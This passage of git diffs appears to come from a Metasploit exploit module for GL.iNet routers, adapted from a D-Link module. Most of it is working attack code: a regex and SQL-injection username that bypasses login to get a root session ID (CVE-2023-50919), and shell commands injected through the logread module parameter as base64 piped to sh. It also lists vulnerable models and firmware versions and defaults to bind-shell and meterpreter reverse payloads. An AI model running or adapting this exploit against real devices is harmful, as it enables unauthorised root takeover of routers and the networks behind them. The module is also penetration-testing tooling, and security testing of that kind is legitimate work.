-          'SOAPACTION' => '"http://purenetworks.com/HNAP1/GetDeviceSettings"'
-        }
+        'method' => 'GET',
+        'ctype' => 'application/x-www-form-urlencoded',
+        'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'model')
       })
-      if res && res.code == 200 && res.body.include?('<GetDeviceSettingsResult>OK</GetDeviceSettingsResult>')
-        xml = res.get_xml_document
-        unless xml.blank?
-          xml.remove_namespaces!
-          @d_link['product'] = xml.css('ModelName').text
-          @d_link['firmware'] = xml.css('FirmwareVersion').text.delete(' ')
-          @d_link['hardware'] = xml.css('HardwareVersion').text
+      if res && res.code == 200 && res.body.include?('model')
+        res_json = res.get_json_document
+        unless res_json.blank?
+          @glinet['model'] = res_json['model']
+          @glinet['firmware'] = '3.x'
         end
       end
     end
 
-    # USE CASE #6: D-Link devices with dynamically generated version and hardware information
-    # Create a DHMAPI POST request to get these hardware details
-    if @d_link['product'].nil?
-      xml_soap_data = <<~EOS
-        <?xml version="1.0" encoding="utf-8"?>
-          <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
-            <soap:Body>
-              <GetDeviceSettings/>
-            </soap:Body>
-          </soap:Envelope>
-      EOS
-      res = send_request_cgi({
-        'rport' => datastore['HTTP_PORT'],
-        'method' => 'POST',
-        'ctype' => 'text/xml',
-        'uri' => normalize_uri(target_uri.path, 'DHMAPI', '/'),
-        'data' => xml_soap_data.to_s,
-        'headers' => {
-          'API-ACTION' => 'GetDeviceSettings'
-        }
-      })
-      if res && res.code == 200 && res.body.include?('<GetDeviceSettingsResult>OK</GetDeviceSettingsResult>')
-        xml = res.get_xml_document
-        unless xml.blank?
-          xml.remove_namespaces!
-          @d_link['product'] = xml.css('ModelName').text
-          @d_link['firmware'] = xml.css('FirmwareVersion').text.delete(' ')
-          @d_link['hardware'] = xml.css('HardwareVersion').text
-        end
-      end
+    # check for the vulnerable models and firmware versions
+    case @glinet['model']
+    when 'ar750', 'ar750s', 'ar300m', 'ar300m16'
+      @glinet['arch'] = 'mipsbe'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
+    when 'mt300n-v2', 'mt1300'
+      @glinet['arch'] = 'mipsle'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
+    when 'ap1300', 'b1300'
+      @glinet['arch'] = 'armle'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
+    when 'e750', 'e750v2'
+      @glinet['arch'] = 'mipsbe'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')
+    when 'mv1000'
+      @glinet['arch'] = 'armle'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')
+    when 'ax1800', 'axt1800', 'mt2500', 'mt2500a', 'mt3000', 'a1300'
+      @glinet['arch'] = 'armle'
+      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')
+    when 'mt6000'
+      @glinet['arch'] = 'armle'
+      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.3')
     end
+    @glinet['arch'] = 'n/a'
+    return false
+  end
 
-    # check the vulnerable product and firmware versions
-    case @d_link['product']
-    when 'GO-RT-AC750'
-      @d_link['arch'] = 'mipsbe'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.01') && @d_link['hardware'][0] == 'A'
-    when 'DIR-300'
-      if Rex::Version.new(@d_link['firmware']) >= Rex::Version.new('2.00') && Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.15') # hardware version B
-        @d_link['arch'] = 'mipsle'
-        return true
-      elsif Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.06') # hardware version A
-        @d_link['arch'] = 'mipsbe'
-        return true
+  def auth_bypass
+    # Check if datastore['SID'] is set
+    return datastore['SID'] unless datastore['SID'].blank?
+
+    # Exploit CVE-2023-50919 to retrieve the SID without valid username and password.
+    # Send an RPC request calling the challenge method, which will return a random nonce,
+    # the selected root user’s salt, and the crypt’s algorithm to hash the password.
+    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"challenge\",\"params\":{\"username\":\"root\"}}"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'text/json',
+      'uri' => normalize_uri(target_uri.path, 'rpc'),
+      'data' => post_data.to_s
+    })
+    if res && res.code == 200 && res.body.include?('nonce')
+      res_json = res.get_json_document
+      unless res_json.blank?
+        nonce = res_json['result']['nonce']
       end
-    when 'DIR-600'
-      @d_link['arch'] = 'mipsle'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.18') && @d_link['hardware'][0] == 'B'
-    when 'DIR-645'
-      @d_link['arch'] = 'mipsle'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.05') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
-    when 'DIR-815'
-      @d_link['arch'] = 'mipsle'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.04')
-    when 'DIR-816L'
-      @d_link['arch'] = 'mipsbe'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.06') && (@d_link['hardware'][0] == 'B' || @d_link['hardware'] == 'N/A')
-    when 'DIR-817LW'
-      @d_link['arch'] = 'mipsbe'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.04') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
-    when 'DIR-818LW', 'DIR-818L'
-      @d_link['arch'] = 'mipsbe'
-      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.04') && @d_link['hardware'][0] == 'B'
-
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.05') && @d_link['hardware'][0] == 'A'
-    when 'DIR-822'
-      @d_link['arch'] = 'mipsbe'
-      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.03') && @d_link['hardware'][0] == 'B'
-
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('3.12') && @d_link['hardware'][0] == 'C'
-    when 'DIR-823'
-      @d_link['arch'] = 'mipsbe'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.00') && @d_link['hardware'][0] == 'A'
-    when 'DIR-845L'
-      @d_link['arch'] = 'mipsle'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.02') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
-    when 'DIR-850L'
-      @d_link['arch'] = 'mipsbe'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
-    when 'DIR-859'
-      @d_link['arch'] = 'mipsbe'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.06') && @d_link['hardware'][0] == 'A'
-    when 'DIR-860L'
-      @d_link['arch'] = 'armle'
-      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.10') && @d_link['hardware'][0] == 'A'
-
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.03') && @d_link['hardware'][0] == 'B'
-    when 'DIR-865L'
-      @d_link['arch'] = 'mipsle'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.07') && @d_link['hardware'][0] == 'A'
-    when 'DIR-868L'
-      @d_link['arch'] = 'armle'
-      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
-
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.05') && @d_link['hardware'][0] == 'B'
-    when 'DIR-869'
-      @d_link['arch'] = 'mipsbe'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.03') && @d_link['hardware'][0] == 'A'
-    when 'DIR-880L'
-      @d_link['arch'] = 'armle'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.08') && @d_link['hardware'][0] == 'A'
-    when 'DIR-890L', 'DIR-890R'
-      @d_link['arch'] = 'armle'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.11') && @d_link['hardware'][0] == 'A'
-    when 'DIR-885L', 'DIR-885R'
-      @d_link['arch'] = 'armle'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
-    when 'DIR-895L', 'DIR-895R'
-      @d_link['arch'] = 'armle'
-      return Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
+    else
+      fail_with(Failure::NotFound, 'Getting the random nonce failed.')
     end
-    false
+    # Perform REGEX and SQL injection to get SID by falsified login and password
+    # Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce
+    username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"
+    pw = '0'
+    hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}")
+
+    # Login with the password hash and obtain the SessionID (SID)
+    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"login\",\"params\":{\"username\":\"#{username}\",\"hash\":\"#{hash}\"}}"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'text/json',
+      'uri' => normalize_uri(target_uri.path, 'rpc'),
+      'data' => post_data.to_s
+    })
+    if res && res.code == 200 && res.body.include?('sid')
+      res_json = res.get_json_document
+      unless res_json.blank?
+        sid = res_json['result']['sid']
+      end
+    else
+      fail_with(Failure::NotFound, 'Retrieving the SessionID (SID) failed.')
+    end
+    return sid
   end
 
   def execute_command(cmd, _opts = {})
-    payload = "#{datastore['URN']};`#{cmd}`"
-
-    connect_udp
-    header = "M-SEARCH * HTTP/1.1\r\n"
-    header << 'HOST:' + datastore['RHOST'].to_s + ':' + datastore['RPORT'].to_s + "\r\n"
-    header << "ST:#{payload}\r\n"
-    header << "MX:2\r\n"
-    header << "MAN:\"ssdp:discover\"\r\n\r\n"
-    udp_sock.put(header)
-    disconnect_udp
+    payload = Base64.strict_encode64(cmd)
+    cmd = "echo #{payload}|openssl enc -base64 -d -A|sh"
+    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"call\",\"params\":[\"#{@sid}\",\"logread\",\"get_system_log\",{\"lines\":\"\",\"module\":\"| #{cmd}\"}]}"
+    return send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'text/json',
+      'cookie' => "Admin-Token=#{@sid}",
+      'uri' => normalize_uri(target_uri.path, 'rpc'),
+      'data' => post_data.to_s
+    })
   end
 
   def check
     print_status("Checking if #{peer} can be exploited.")
-    res = send_request_cgi!({
-      'rport' => datastore['HTTP_PORT'],
-      'method' => 'GET',
-      'ctype' => 'application/x-www-form-urlencoded',
-      'uri' => normalize_uri(target_uri.path)
-    })
-    # Check if target is a D-Link network device
-    return CheckCode::Unknown('No response received from target.') unless res
-    return CheckCode::Safe('Likely not a D-Link network device.') unless res.code == 200 && res.body =~ /d-?link/i
+    # Check if target is a GL.iNet network device and the firmware version is vulnerable
+    return CheckCode::Vulnerable("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if vuln_version?
 
-    # check if firmware version is vulnerable
-    return CheckCode::Appears("Product info: #{@d_link['product']}|#{@d_link['firmware']}|#{@d_link['hardware']}|#{@d_link['arch']}") if vuln_version?(res)
-    # D-link devices with fixed firmware versions
-    return CheckCode::Safe("Product info: #{@d_link['product']}|#{@d_link['firmware']}|#{@d_link['hardware']}|#{@d_link['arch']}") unless @d_link['arch'].nil?
-    # D-link devices that still could be vulnerable with product information
-    return CheckCode::Detected("Product info: #{@d_link['product']}|#{@d_link['firmware']}|#{@d_link['hardware']}|#{@d_link['arch']}") unless @d_link['product'].nil?
+    unless @glinet['firmware'].nil?
+      # GL.iNet network devices with firmware version 3.x that are safe from this exploit
+      return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.0.0')
 
-    # D-link devices that still could be vulnerable but no product information available
-    return CheckCode::Detected
+      # GL.iNet network devices with a firmware version 4.x or higher which still could be vulnerable unless the architecture is not available (n/a)
+      if @glinet['arch'] != 'n/a' && (Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0'))
+        return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}")
+      end
+      return CheckCode::Detected("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0')
+    end
+    # No GL.iNet network device or not reachable
+    CheckCode::Unknown('No GL.iNet network device or device is not responding.')
   end
 
   def exploit
+    @sid = auth_bypass
+    print_status("SID: #{@sid}")
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']
     when :unix_cmd

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -132,13 +132,13 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_request_cgi({
         'method' => 'GET',
         'ctype' => 'application/x-www-form-urlencoded',
-        'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'model')
+        'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'hello')
       })
-      if res && res.code == 200 && res.body.include?('model')
+      if res && res.code == 200 && res.body.include?('model') && res.body.include?('version')
         res_json = res.get_json_document
         unless res_json.blank?
           @glinet['model'] = res_json['model']
-          @glinet['firmware'] = '3.x'
+          @glinet['firmware'] = res_json['version']
         end
       end
     end

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -165,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')
     when 'mt6000'
       @glinet['arch'] = 'armle'
-      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.3')
+      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.5.3')
     end
     @glinet['arch'] = 'n/a'
     return false

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
           interface in the `logread` module.
           This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen
           by the attacker.
-          However, by chaining this exploit with vulnerability CVE-2023-50919, you can bypass the Nginx authentication
+          However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication
           through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be
           retrieved without knowing a valid username and password.
 
@@ -103,7 +103,18 @@ class MetasploitModule < Msf::Exploit::Remote
   def vuln_version?
     @glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }
     # check first with version 4.x api call
-    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"call\",\"params\":[\"\",\"ui\",\"check_initialized\",{}]}"
+    post_data = {
+      jsonrpc: '2.0',
+      id: rand(1000..9999),
+      method: 'call',
+      params: [
+        '',
+        'ui',
+        'check_initialized',
+        {}
+      ]
+    }.to_json
+
     res = send_request_cgi({
       'method' => 'POST',
       'ctype' => 'text/json',
@@ -167,7 +178,15 @@ class MetasploitModule < Msf::Exploit::Remote
     # Exploit CVE-2023-50919 to retrieve the SID without valid username and password.
     # Send an RPC request calling the challenge method, which will return a random nonce,
     # the selected root user’s salt, and the crypt’s algorithm to hash the password.
-    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"challenge\",\"params\":{\"username\":\"root\"}}"
+    post_data = {
+      jsonrpc: '2.0',
+      id: rand(1000..9999),
+      method: 'challenge',
+      params: {
+        username: 'root'
+      }
+    }.to_json
+
     res = send_request_cgi({
       'method' => 'POST',
       'ctype' => 'text/json',
@@ -182,14 +201,24 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       fail_with(Failure::NotFound, 'Getting the random nonce failed.')
     end
-    # Perform REGEX and SQL injection to get SID by falsified login and password
+    # Perform REGEX to lookup uid field from /etc/shadow to be used as password with manipulated root username
+    # Use the SQL injection part to lookup the ACLs for root stored in sqlite db
     # Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce
     username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"
     pw = '0'
     hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}")
 
     # Login with the password hash and obtain the SessionID (SID)
-    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"login\",\"params\":{\"username\":\"#{username}\",\"hash\":\"#{hash}\"}}"
+    post_data = {
+      jsonrpc: '2.0',
+      id: rand(1000..9999),
+      method: 'login',
+      params: {
+        username: username.to_s,
+        hash: hash.to_s
+      }
+    }.to_json
+
     res = send_request_cgi({
       'method' => 'POST',
       'ctype' => 'text/json',
@@ -210,7 +239,21 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, _opts = {})
     payload = Base64.strict_encode64(cmd)
     cmd = "echo #{payload}|openssl enc -base64 -d -A|sh"
-    post_data = "{\"jsonrpc\":\"2.0\",\"id\":#{rand(1000..9999)},\"method\":\"call\",\"params\":[\"#{@sid}\",\"logread\",\"get_system_log\",{\"lines\":\"\",\"module\":\"| #{cmd}\"}]}"
+    post_data = {
+      jsonrpc: '2.0',
+      id: rand(1000..9999),
+      method: 'call',
+      params: [
+        @sid.to_s,
+        'logread',
+        'get_system_log',
+        {
+          lines: '',
+          module: "| #{cmd}"
+        }
+      ]
+    }.to_json
+
     return send_request_cgi({
       'method' => 'POST',
       'ctype' => 'text/json',

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -33,6 +33,9 @@ class MetasploitModule < Msf::Exploit::Remote
           - MT6000: v4.5.0 - v4.5.3;
           - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;
           - E750/E750V2, MV1000: v4.3.8;
+          - X3000: v4.0.0 - v4.4.2;
+          - XE3000: v4.0.0 - v4.4.3
+          - SFT1200: v4.3.6;
           - and potentially others (just try ;-)
 
           NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
@@ -55,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2013-12-10',
         'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE],
+        'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],
         'Privileged' => true,
         'Targets' => [
           [
@@ -73,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux Dropper',
             {
               'Platform' => 'linux',
-              'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE],
+              'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],
               'Type' => :linux_dropper,
               'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
               'Linemax' => 900,
@@ -145,6 +148,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # check for the vulnerable models and firmware versions
     case @glinet['model']
+    when 'sft1200'
+      @glinet['arch'] = 'mipsle'
+      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.6')
     when 'ar750', 'ar750s', 'ar300m', 'ar300m16'
       @glinet['arch'] = 'mipsbe'
       return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')
@@ -160,12 +166,21 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'mv1000'
       @glinet['arch'] = 'armle'
       return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')
-    when 'ax1800', 'axt1800', 'mt2500', 'mt2500a', 'mt3000', 'a1300'
+    when 'ax1800', 'axt1800', 'a1300'
       @glinet['arch'] = 'armle'
       return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')
+    when 'mt2500', 'mt2500a', 'mt3000'
+      @glinet['arch'] = 'aarch64'
+      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')
     when 'mt6000'
-      @glinet['arch'] = 'armle'
+      @glinet['arch'] = 'aarch64'
       return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.5.3')
+    when 'x3000'
+      @glinet['arch'] = 'aarch64'
+      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.2')
+    when 'xe3000'
+      @glinet['arch'] = 'aarch64'
+      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.3')
     end
     @glinet['arch'] = 'n/a'
     return false

--- a/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
+++ b/modules/exploits/linux/http/glinet_unauth_rce_cve_2023_50445.rb
@@ -1,0 +1,349 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::Udp
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GL.Inet Unauthenticated Remote Command Execution via the logread module.',
+        'Description' => %q{
+          A command injection vulnerability exists in multiple GL.Inet network products, allowing an attacker
+          to inject and execute arbitrary shell commands via JSON parameters at the gl_system_log and gl_crash_log
+          interface in the logread module.
+          This exploit requires post-authentication using the AdminToken cookie (SID), typically stolen by the attacker.
+          However, by chaining this exploit with vulnerability CVE-2023-50919, you can bypass the Nginx authentication through
+          a Lua string pattern matching vulnerability. The session ID (SID) can be retrieved without knowing a
+          valid username and password.
+          GL.Inet network products with firmware versions between `4.0.0` and `4.5.0` are vulnerable.
+          Vulnerabilities are fixed in the `4.5.0` version.
+
+
+          NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
+          when using the Linux Dropper target.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'DZONERZY', # Discovery of the vulnerability CVE-2023-50919
+          'Naihsin https://github.com/naihsin'
+
+        ],
+        'References' => [
+          ['CVE', '2023-50445'],
+          ['CVE', '2020-50919'],
+          ['URL', 'https://attackerkb.com/topics/uqicA23ecz/cve-2023-50919'],
+          ['URL', 'https://attackerkb.com/topics/uqicA23ecz/cve-2023-50445'],
+          ['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']
+        ],
+        'DisclosureDate' => '2013-12-10',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl', 'echo', 'printf', 'bourne'],
+              'Linemax' => 900,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('SID', [false, 'Session ID'])
+    ])
+  end
+
+  def vuln_version?(res)
+    # checks the model, firmware and hardware version
+    @d_link = { 'product' => nil, 'firmware' => nil, 'hardware' => nil, 'arch' => nil }
+    html = Nokogiri.HTML(res.body, nil, 'UTF-8')
+
+    # USE CASE #1: D-link devices with static HTML pages with model and version information
+    # class identifiers: <span class="product">, <span class="version"> and <span class="hwversion">
+    # See USE CASE #4 for D-link devices that use javascript to dynamically generate the model and firmware version
+    product = html.css('span[@class="product"]')
+    @d_link['product'] = product[0].text.split(':')[1].strip unless product[0].nil?
+    firmware = html.css('span[@class="version"]')
+    @d_link['firmware'] = firmware[0].text.split(':')[1].strip.delete(' ') unless firmware[0].nil?
+
+    # DIR-600, DIR-300 hardware B revision  and maybe other models are using the "version" class tag for both firmware and hardware version
+    @d_link['hardware'] = firmware[1].text.split(':')[1].strip unless firmware[1].nil?
+    # otherwise search for the "hwversion" class tag
+    hardware = html.css('span[@class="hwversion"]')
+    @d_link['hardware'] = hardware[0].text.split(':')[1].strip unless hardware[0].nil?
+
+    # USE CASE #2: D-link devices with static HTML pages with model and version information
+    # class identifiers: <div class="pp">, <div class="fwv"> and <div class="hwv">
+    if @d_link['product'].nil?
+      product = html.css('div[@class="pp"]')
+      @d_link['product'] = product[0].text.split(':')[1].strip unless product[0].nil?
+      firmware = html.css('div[@class="fwv"]')
+      @d_link['firmware'] = firmware[0].text.split(':')[1].strip.delete(' ') unless firmware[0].nil?
+      hardware = html.css('div[@class="hwv"]')
+      @d_link['hardware'] = hardware[0].text.split(':')[1].strip unless hardware[0].nil?
+    end
+
+    # USE CASE #3: D-link devices with html below for model, firmware and hardware version
+    # <td>Product Page&nbsp;:&nbsp;<a href='http://support.dlink.com.tw'  target=_blank><font class=l_tb>DIR-300</font></a>&nbsp;&nbsp;&nbsp;</td>
+    # <td noWrap align="right">Hardware Version&nbsp;:&nbsp;rev N/A&nbsp;</td>
+    # <td noWrap align="right">Firmware Version&nbsp;:&nbsp;1.06&nbsp;</td>
+    if @d_link['product'].nil?
+      hwinfo_table = html.css('td')
+      hwinfo_table.each do |hwinfo|
+        @d_link['product'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /Product Page/i || hwinfo.text =~ /Product/i
+        @d_link['hardware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /Hardware Version/i
+        @d_link['firmware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /Firmware Version/i
+      end
+    end
+
+    # USE CASE #4: D-Link devices with HTML listed below that contains the model, firmware and hardware version
+    # <table id="header_container" border="0" cellpadding="5" cellspacing="0" width="838" align="center">
+    # <tr>
+    #   <td width="100%">&nbsp;&nbsp;<script>show_words(TA2)</script>: <a href="http://support.dlink.com.tw/">DIR-835</a></td>
+    #   <td align="right" nowrap><script>show_words(TA3)</script>: A1 &nbsp;</td>
+    #   <td align="right" nowrap><script>show_words(sd_FWV)</script>: 1.04</td>
+    #   <td>&nbsp;</td>
+    # </tr>
+    # </table>
+    if @d_link['product'].nil?
+      hwinfo_table = html.css('table#header_container td')
+      hwinfo_table.each do |hwinfo|
+        @d_link['product'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /show_words\(TA2\)/i
+        @d_link['hardware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /show_words\(TA3\)/i
+        @d_link['firmware'] = hwinfo.text.split(':')[1].strip.gsub(/\p{Space}*/u, '') if hwinfo.text =~ /show_words\(sd_FWV\)/i
+      end
+    end
+
+    # USE CASE #5: D-Link devices with dynamically generated version and hardware information
+    # Create HNAP POST request to get these hardware details
+    if @d_link['product'].nil?
+      xml_soap_data = <<~EOS
+        <?xml version="1.0" encoding="utf-8"?>
+          <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+            <soap:Body>
+              <GetDeviceSettings xmlns="http://purenetworks.com/HNAP1/" />
+            </soap:Body>
+          </soap:Envelope>
+      EOS
+      res = send_request_cgi({
+        'rport' => datastore['HTTP_PORT'],
+        'method' => 'POST',
+        'ctype' => 'text/xml',
+        'uri' => normalize_uri(target_uri.path, 'HNAP1', '/'),
